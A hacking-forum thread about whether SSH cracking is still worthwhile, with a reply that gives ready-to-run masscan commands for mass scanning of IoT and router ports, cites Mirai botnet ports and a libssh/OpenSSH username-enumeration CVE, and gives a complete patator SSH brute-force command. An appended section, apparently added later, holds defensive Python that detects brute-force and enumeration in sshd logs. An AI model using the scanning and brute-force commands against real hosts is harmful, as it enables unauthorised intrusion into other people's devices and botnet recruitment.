Cracking SSH
by ksecurity - September 15, 2021 at 03:45 PM
Does cracking SSH make sense in 2021?

What will the community vote for? Which kind of scanning method is recommended these days?

1. Cracking SSH
2. Exploiting RCE bugs
3. Scanning for IOT Devices.
Cracking SSH makes sense if you crack the SSH of IOT devices and routers. Servers with their admins are a hard target.
If you are on Linux, I think you should of course use masscan/zmap, but masscan is better and I will tell you about masscan. Masscan by default scans IPs and ports and checks whether a port is open or not; it doesn't check whether an SSH service is on the port. You can add the option --banners; then Masscan will grab the banners of the services on open ports.
For example:
sudo masscan -iL fileWithIps --open -p 1900-2300,22,2323,3232,1234,12345 --banners --rate=5000 -oL YourOutputFile
-iL - file with ips.
--open - check for only open(not filtered) ports
-p - ports
--rate - qty of kpp
-oL - output file
After masscan has done its work, you will have the open ports and banners in the output file. If you need to see all ports with SSH:
cat YourOutputFile | grep ssh
What about exploits? Libssh is very nice for RCE. However, the more popular OpenSSH is more protected than libssh. I usually use CVE-2018-15473 (username enumeration, not RCE).
If you are looking for IOT devices, you need to set the scanning ports to 23,2323,32,3232,22 (as the bots of the Mirai botnet do) and other ports that IOT usually uses.
Bruteforce. I think the best bruteforcer is patator. For example:
python3 ssh_login host=COMBO00 port=COMBO01 user=FILE1 password=FILE2 0=hosts_ports.txt 1=users.txt 2=pass.txt -l outDir --threads 32 -x skip=0:fgrep='No route to host' -x skip=0:fgrep='Bad authentication type' -x ignore:code=1
(OpenSSH usually sends 'Bad authentication type' if you need a public key, and 'No route to host' if the host is down.)
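Added here as an example, not from the thread: the defender-side counterpart to the brute-force and username-enumeration traffic the post describes. It parses constructed sshd syslog lines and flags a source that racks up many failed logins, or tries many distinct usernames, inside a short window; the log format, thresholds and sample addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines (syslog format); not taken from a real host.
SAMPLE_LOG = """\
Sep 15 15:40:01 gw sshd[2201]: Failed password for invalid user admin from 198.51.100.7 port 51022 ssh2
Sep 15 15:40:02 gw sshd[2203]: Failed password for invalid user root from 198.51.100.7 port 51024 ssh2
Sep 15 15:40:02 gw sshd[2205]: Invalid user pi from 198.51.100.7 port 51026
Sep 15 15:40:03 gw sshd[2207]: Failed password for invalid user ubnt from 198.51.100.7 port 51028 ssh2
Sep 15 15:40:04 gw sshd[2209]: Failed password for invalid user support from 198.51.100.7 port 51030 ssh2
Sep 15 15:40:05 gw sshd[2211]: Failed password for invalid user guest from 198.51.100.7 port 51032 ssh2
Sep 15 15:41:10 gw sshd[2301]: Failed password for alice from 203.0.113.5 port 40010 ssh2
Sep 15 15:41:30 gw sshd[2303]: Accepted publickey for alice from 203.0.113.5 port 40012 ssh2
"""

# Matches the two sshd messages that mark a failed or unknown-user attempt.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?:Failed password for (?:invalid user )?(?P<user1>\S+)|Invalid user (?P<user2>\S+)) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_events(text, year=2021):
    """Return (timestamp, source_ip, username) for each failed-auth line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # accepted logins and unrelated lines are skipped
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, m.group("ip"), m.group("user1") or m.group("user2")))
    return events

def flag_sources(events, window_s=60, max_failures=5, max_users=4):
    """Flag IPs with >= max_failures attempts or >= max_users distinct names in any window."""
    by_ip = defaultdict(list)
    for ts, ip, user in sorted(events):
        by_ip[ip].append((ts, user))
    flagged = {}
    for ip, items in by_ip.items():
        start, best_fail, best_users = 0, 0, 0
        for end in range(len(items)):
            while (items[end][0] - items[start][0]).total_seconds() > window_s:
                start += 1  # slide the window forward
            win = items[start:end + 1]
            best_fail = max(best_fail, len(win))
            best_users = max(best_users, len({u for _, u in win}))
        if best_fail >= max_failures or best_users >= max_users:
            flagged[ip] = {"failures": best_fail, "distinct_users": best_users}
    return flagged

if __name__ == "__main__":
    print(flag_sources(parse_events(SAMPLE_LOG)))
```

The distinct-username count catches the enumeration pattern even when each name is tried only once, which a plain failure counter with a high threshold would miss.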

